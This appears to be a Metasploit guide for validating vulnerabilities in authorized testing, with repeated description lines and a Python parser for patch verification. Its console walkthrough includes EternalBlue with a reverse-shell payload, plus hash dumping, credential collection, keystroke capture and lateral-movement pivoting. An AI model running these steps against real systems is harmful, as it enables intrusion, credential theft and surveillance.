Verifies vulnerabilities using Metasploit Framework exploits like EternalBlue and Log4Shell, auxiliary scanners, and post-exploitation modules to prioritize remediation in vulnerability management.
Metasploit Framework is the most widely used penetration testing platform in the world. Maintained by Rapid7, it contains more than 2,300 exploit modules, 1,200 auxiliary modules and 400 post-exploitation modules. In a vulnerability management context, Metasploit serves as a validation tool: it confirms whether a discovered vulnerability is actually exploitable, which enables risk-based prioritization and demonstrates real impact to stakeholders.
Guides Metasploit workflows to validate scanner-found vulnerabilities, demonstrate risk, and verify patches in authorized pentesting.
Guides exploitation of vulnerabilities using Metasploit Framework for validating scanner findings, demonstrating risk, and prioritizing remediation in authorized pentesting.
Guides authorized Metasploit Framework use for penetration testing, exploit development, vulnerability validation, and post-exploitation workflows in controlled environments.
Unlike offensive red-team exercises, vulnerability management uses Metasploit to:
# Start PostgreSQL and initialize the database
sudo systemctl start postgresql
sudo msfdb init
# Launch msfconsole
msfconsole -q
# Verify the database connection
msf6> db_status
msf6> workspace -a vuln_validation_2025
# Import vulnerability scan results
msf6> db_import /path/to/nessus_scan.nessus
msf6> hosts
msf6> vulns
# Example: validate MS17-010 (EternalBlue) from a scan finding
msf6> search type:exploit name:ms17_010
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> show options
msf6> set RHOSTS 192.168.1.100
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 192.168.1.50
msf6> set LPORT 4444
# Run the check command first (non-exploitative validation)
msf6> check
# [+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010!
# Exploit only after check confirms the vulnerability and the engagement is authorized
msf6> exploit
# Example: validate Apache Struts RCE (CVE-2017-5638)
msf6> use exploit/multi/http/struts2_content_type_ognl
msf6> set RHOSTS target.example.com
msf6> set RPORT 8080
msf6> set TARGETURI /showcase.action
msf6> check
# Example: validate Log4Shell (CVE-2021-44228)
msf6> use exploit/multi/http/log4shell_header_injection
msf6> set RHOSTS target.example.com
msf6> set HTTP_HEADER X-Api-Version
msf6> check
# SMB vulnerability scan
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6> set RHOSTS 192.168.1.0/24
msf6> set THREADS 10
msf6> run
# SSL/TLS vulnerability check
msf6> use auxiliary/scanner/ssl/openssl_heartbleed
msf6> set RHOSTS target.example.com
msf6> run
# HTTP vulnerability validation
msf6> use auxiliary/scanner/http/dir_listing
msf6> set RHOSTS target.example.com
msf6> run
# Database authentication test
msf6> use auxiliary/scanner/mssql/mssql_login
msf6> set RHOSTS db-server.corp.local
msf6> set USERNAME sa
msf6> set PASSWORD ""
msf6> run
# After a successful exploit, demonstrate impact
meterpreter> getuid
meterpreter> sysinfo
meterpreter> hashdump
meterpreter> run post/multi/gather/env
meterpreter> run post/windows/gather/enum_patches
meterpreter> run post/windows/gather/credentials/credential_collector
# Network lateral movement demonstration
meterpreter> run post/multi/manage/autoroute
meterpreter> run auxiliary/server/socks_proxy
# Screenshot as evidence
meterpreter> screenshot
meterpreter> keyscan_start
# Export exploitation evidence
msf6> vulns -o /tmp/validated_vulns.csv
msf6> hosts -o /tmp/compromised_hosts.csv
msf6> creds -o /tmp/captured_creds.csv
msf6> loot -o /tmp/captured_loot.csv
# Generate a report from the database
msf6> db_export -f xml /tmp/msf_report.xml
# After remediation, verify the exploit no longer works
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.100
msf6> check
# [-] 192.168.1.100:445 - Host does NOT appear vulnerable.
# Patch verification successful
Run the check command before exploit whenever the module provides one.
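As an added example (not part of this skill or of Metasploit itself), the Python below reads the check verdict lines shown above from saved msfconsole output (for instance a spool file) and reconciles a pre-patch run with a post-patch run into a remediation status per target, so the validation and patch-verification steps can be tracked for many hosts at once. The hosts other than 192.168.1.100 and the "Scanned" status line are constructed sample data.

```python
import re
# One "[flag] host:port - message" line as printed by a module's check command
CHECK_LINE = re.compile(r"^\[(?P<flag>[+\-*!])\]\s+(?P<host>[^\s:]+):(?P<port>\d+)\s+-\s+(?P<msg>.+)$")
def classify(flag, msg):
    """Turn one check message into 'vulnerable', 'not_vulnerable' or 'unknown'."""
    text = msg.lower()
    if not re.search(r"vulnerable|exploitable", text):
        return "unknown"              # progress or status line, no verdict
    if re.search(r"\bnot\b", text):    # "does NOT appear vulnerable", "not exploitable"
        return "not_vulnerable"
    return "vulnerable" if flag == "+" else "unknown"
def parse_check_log(text):
    """Map 'host:port' to its verdict; a later status line never erases a verdict."""
    results = {}
    for line in text.splitlines():
        m = CHECK_LINE.match(line.strip())
        if not m:
            continue                  # prompts, banners, blank lines
        key = f"{m['host']}:{m['port']}"
        verdict = classify(m["flag"], m["msg"])
        if key not in results or verdict != "unknown":
            results[key] = verdict
    return results
def remediation_status(before, after):
    """Compare pre-patch and post-patch check results per target."""
    status = {}
    for target, pre in before.items():
        post = after.get(target)
        if pre != "vulnerable":
            status[target] = "not_affected"     # nothing to remediate
        elif post == "not_vulnerable":
            status[target] = "remediated"
        elif post == "vulnerable":
            status[target] = "still_vulnerable"
        else:
            status[target] = "unverified"       # no conclusive post-patch check
    return status
# Constructed sample output; 192.168.1.101-103 are made-up hosts, not from the page
PRE_PATCH_LOG = """\
[+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010!
[+] 192.168.1.101:445 - Host is likely VULNERABLE to MS17-010!
[-] 192.168.1.102:445 - Host does NOT appear vulnerable.
[+] 192.168.1.103:445 - Host is likely VULNERABLE to MS17-010!
[*] 192.168.1.103:445 - Scanned 1 of 1 hosts (100% complete)
"""
POST_PATCH_LOG = """\
[-] 192.168.1.100:445 - Host does NOT appear vulnerable.
[+] 192.168.1.101:445 - Host is likely VULNERABLE to MS17-010!
"""
REPORT = remediation_status(parse_check_log(PRE_PATCH_LOG), parse_check_log(POST_PATCH_LOG))
```

A target that was vulnerable before patching but has no conclusive post-patch verdict is reported as unverified rather than remediated, so a missing re-check cannot be mistaken for a fix.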